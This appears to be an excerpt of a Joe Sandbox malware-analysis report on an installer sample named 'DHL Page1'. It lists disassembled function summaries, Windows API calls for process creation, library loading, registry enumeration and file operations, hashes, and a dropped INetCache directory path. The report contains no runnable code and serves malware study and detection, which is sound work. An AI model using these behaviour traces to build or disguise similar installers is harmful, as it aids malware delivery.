                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID: Call
                                              • API String ID: 3677997916-1824292864
                                              • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                              • Instruction ID: bc20ea416eaf490cc29d32db83e74b31e5ada777993a97a24a2aa5475f1120d1
                                              • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                              • Instruction Fuzzy Hash: 14015A3110020AEADF218F26ED08EDB3BB9EF48350F01403AF845D6220D734D964CBA5
                                              APIs
                                                • Part of subcall function 00405393: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053CB
                                                • Part of subcall function 00405393: lstrlenW.KERNEL32(00402EAD,Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053DB
                                                • Part of subcall function 00405393: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00402EAD,00402EAD,Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00000000,00000000,00000000), ref: 004053EE
                                                • Part of subcall function 00405393: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll), ref: 00405400
                                                • Part of subcall function 00405393: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405426
                                                • Part of subcall function 00405393: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405440
                                                • Part of subcall function 00405393: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040544E
                                                • Part of subcall function 00405914: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430290,Error launching installer), ref: 0040593D
                                                • Part of subcall function 00405914: CloseHandle.KERNEL32(?), ref: 0040594A
                                              • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401F04
                                              • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401F19
                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00401F26
                                              • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401F4D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                              • String ID:
                                              • API String ID: 3585118688-0
                                              • Opcode ID: 0d40370652eb81003481abe3ce29e96ae05eb3161985268492f381a3e2b30258
                                              • Instruction ID: e614f92d6b01e5dc42dea4a87df5fedfc64ce03d1853b5f6b9edcf2ca3e8dd58
                                              • Opcode Fuzzy Hash: 0d40370652eb81003481abe3ce29e96ae05eb3161985268492f381a3e2b30258
                                              • Instruction Fuzzy Hash: 2811AD31904109FBCF10AFA0DD84ADD7AB6EF00354F21803BF606B60E1C7B98A92DB59
                                              APIs
                                              • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,0040314B,000000FF,00000000,00000000,0040A230,?), ref: 004031C2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: FilePointer
                                              • String ID: 0A
                                              • API String ID: 973152223-2007828011
                                              • Opcode ID: 599661cd1e1f4e026d5e2592e4daac1fd1dfe16f38b101af0cb72e1788b7423d
                                              • Instruction ID: 1b31a9a46ac4025ad01e28160671f4af54b66250eb8a32785efaeec8d4788e79
                                              • Opcode Fuzzy Hash: 599661cd1e1f4e026d5e2592e4daac1fd1dfe16f38b101af0cb72e1788b7423d
                                              • Instruction Fuzzy Hash: 34316F30201219FFDB209F95EE84A9F7F68EB05759B20447FF904E61D0D2789A509BA9
                                              APIs
                                                • Part of subcall function 00405C93: CharNextW.USER32(?,?,0042FA90,?,00405D07,0042FA90,0042FA90, 4Ou.Ou,?,754F2EE0,00405A45,?,754F3420,754F2EE0,00000000), ref: 00405CA1
                                                • Part of subcall function 00405C93: CharNextW.USER32(00000000), ref: 00405CA6
                                                • Part of subcall function 00405C93: CharNextW.USER32(00000000), ref: 00405CBE
                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                • Part of subcall function 00405862: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004058A5
                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage,?,00000000,000000F0), ref: 0040164D
                                              Strings
                                              • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage, xrefs: 00401640
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                              • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage
                                              • API String ID: 1892508949-2332303660
                                              • Opcode ID: 0eba2085d3260377ef01b64c51b78cf437421a5ff583a9c90046e2813c0af6be
                                              • Instruction ID: 7982f2e2caade167f262f2ac7f0c98440bfe6d5d070035d5abd9b478c5482f04
                                              • Opcode Fuzzy Hash: 0eba2085d3260377ef01b64c51b78cf437421a5ff583a9c90046e2813c0af6be
                                              • Instruction Fuzzy Hash: 3711E631504514ABCF30BFA5CD4199F36A0EF15369B25493BEA02B21F1DB3E4D819B5E
                                              APIs
                                                • Part of subcall function 00406234: lstrcpynW.KERNEL32(?,?,00000400,00403519,00433F20,NSIS Error), ref: 00406241
                                                • Part of subcall function 00405C93: CharNextW.USER32(?,?,0042FA90,?,00405D07,0042FA90,0042FA90, 4Ou.Ou,?,754F2EE0,00405A45,?,754F3420,754F2EE0,00000000), ref: 00405CA1
                                                • Part of subcall function 00405C93: CharNextW.USER32(00000000), ref: 00405CA6
                                                • Part of subcall function 00405C93: CharNextW.USER32(00000000), ref: 00405CBE
                                              • lstrlenW.KERNEL32(0042FA90,00000000,0042FA90,0042FA90, 4Ou.Ou,?,754F2EE0,00405A45,?,754F3420,754F2EE0,00000000), ref: 00405D49
                                              • GetFileAttributesW.KERNELBASE(0042FA90,0042FA90,0042FA90,0042FA90,0042FA90,0042FA90,00000000,0042FA90,0042FA90, 4Ou.Ou,?,754F2EE0,00405A45,?,754F3420,754F2EE0), ref: 00405D59
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                              • String ID: 4Ou.Ou
                                              • API String ID: 3248276644-1848101107
                                              • Opcode ID: 53e12d784ef837e8db80ec3fb7baa10e40d76a96b883b7f92eedeb36793dbc32
                                              • Instruction ID: 4ec1b5d8fbd52b75359688d51f087b2d563f7ccff9bef2ccb556163a4013e6ac
                                              • Opcode Fuzzy Hash: 53e12d784ef837e8db80ec3fb7baa10e40d76a96b883b7f92eedeb36793dbc32
                                              • Instruction Fuzzy Hash: 0DF02829105E1116D722333A2C0DFAF1559CEC236471A853FF851B52C1DB3C88438CBE
                                              APIs
                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430290,Error launching installer), ref: 0040593D
                                              • CloseHandle.KERNEL32(?), ref: 0040594A
                                              Strings
                                              • Error launching installer, xrefs: 00405927
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: CloseCreateHandleProcess
                                              • String ID: Error launching installer
                                              • API String ID: 3712363035-66219284
                                              • Opcode ID: b5eac4c8670a379a1fdb0849bd47085a0ce86dd70ec211609265b45d4efc13a4
                                              • Instruction ID: f714b94520bea21c366fb1e21a7d32544acf27ff5ed30f93b3bc1a8433c1b7bf
                                              • Opcode Fuzzy Hash: b5eac4c8670a379a1fdb0849bd47085a0ce86dd70ec211609265b45d4efc13a4
                                              • Instruction Fuzzy Hash: F4E092B4A00209BFEB00AB64ED49F7B7BACEB04748F008965B954E2190D774A9248A68
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 0040205D
                                                • Part of subcall function 00405393: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053CB
                                                • Part of subcall function 00405393: lstrlenW.KERNEL32(00402EAD,Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053DB
                                                • Part of subcall function 00405393: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00402EAD,00402EAD,Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00000000,00000000,00000000), ref: 004053EE
                                                • Part of subcall function 00405393: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll), ref: 00405400
                                                • Part of subcall function 00405393: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405426
                                                • Part of subcall function 00405393: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405440
                                                • Part of subcall function 00405393: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040544E
                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 0040206E
                                              • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,?,000000F0), ref: 004020EB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                              • String ID:
                                              • API String ID: 334405425-0
                                              • Opcode ID: be7a47489ea50018fbd76c873434aa4b4615dfcfa67a4a1c51b4c4650fb71424
                                              • Instruction ID: 5c83051e151f5a57f9d6a67b97a1337a6843f277470dde6dc09651adf155129a
                                              • Opcode Fuzzy Hash: be7a47489ea50018fbd76c873434aa4b4615dfcfa67a4a1c51b4c4650fb71424
                                              • Instruction Fuzzy Hash: 00219C71900215FACF20AFA5CE4999E7971FF04358F20453BF511B51E0CBBD8982DA6D
                                              APIs
                                              • GlobalFree.KERNEL32(04836E88), ref: 00401BE1
                                              • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: Global$AllocFree
                                              • String ID: Call
                                              • API String ID: 3394109436-1824292864
                                              • Opcode ID: 570c0905b13829ae1836afe61d189b829c8b41a936c28089b6656c7f7f362310
                                              • Instruction ID: 94690b970293462310cd42ff97a6ac8f03d0230ec7ec3c7cefeb9ae3e3c1ef53
                                              • Opcode Fuzzy Hash: 570c0905b13829ae1836afe61d189b829c8b41a936c28089b6656c7f7f362310
                                              • Instruction Fuzzy Hash: 42218172600110DBDB20EB94CF8495A73E8EB44318725457BE202B72D0DBB8AC919BAD
                                              APIs
                                                • Part of subcall function 00406577: FindFirstFileW.KERNELBASE(?,004302D8,0042FA90,00405D39,0042FA90,0042FA90,00000000,0042FA90,0042FA90, 4Ou.Ou,?,754F2EE0,00405A45,?,754F3420,754F2EE0), ref: 00406582
                                                • Part of subcall function 00406577: FindClose.KERNEL32(00000000), ref: 0040658E
                                              • lstrlenW.KERNEL32 ref: 00402299
                                              • lstrlenW.KERNEL32(00000000), ref: 004022A4
                                              • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004022CD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: FileFindlstrlen$CloseFirstOperation
                                              • String ID:
                                              • API String ID: 1486964399-0
                                              • Opcode ID: d5c5f44156de87c1167265a4648fb5279e580d22fe9ae9a4ebfd0d6556505392
                                              • Instruction ID: ee8ac65e668f3af58b9baaf7b23fc0e5dde34fb994b390349e9eab9aa0c768da
                                              • Opcode Fuzzy Hash: d5c5f44156de87c1167265a4648fb5279e580d22fe9ae9a4ebfd0d6556505392
                                              • Instruction Fuzzy Hash: 84117CB1904318AADB10EFE9DA499DEB7B8EF04358F10847FA905F72D1D6B8C5818B19
                                              APIs
                                                • Part of subcall function 00402D5D: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402D85
                                              • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402544
                                              • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402557
                                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsv4331.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040256D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: Enum$CloseOpenValue
                                              • String ID:
                                              • API String ID: 167947723-0
                                              • Opcode ID: 8d490a0f7bb4621e12093ce688087f24f41224cda3ee635b2e314be58bb4efad
                                              • Instruction ID: 104f7cdb5580bb57a0ef39117b7f9c08f86abfc11cf66101166623a2e680798b
                                              • Opcode Fuzzy Hash: 8d490a0f7bb4621e12093ce688087f24f41224cda3ee635b2e314be58bb4efad
                                              • Instruction Fuzzy Hash: B3018F71904204BFE7109FA59E8CABF766CEF80398F10443EF506A61D0EAF84E419A29
                                              APIs
                                              • CreateFileA.KERNELBASE(00000000), ref: 10002963
                                              • GetLastError.KERNEL32 ref: 10002A6A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123239636452.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000000.00000002.123239605456.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.123239665702.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.123239691897.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_10000000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: CreateErrorFileLast
                                              • String ID:
                                              • API String ID: 1214770103-0
                                              • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                              • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                              • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                              • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                              APIs
                                                • Part of subcall function 00402D5D: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402D85
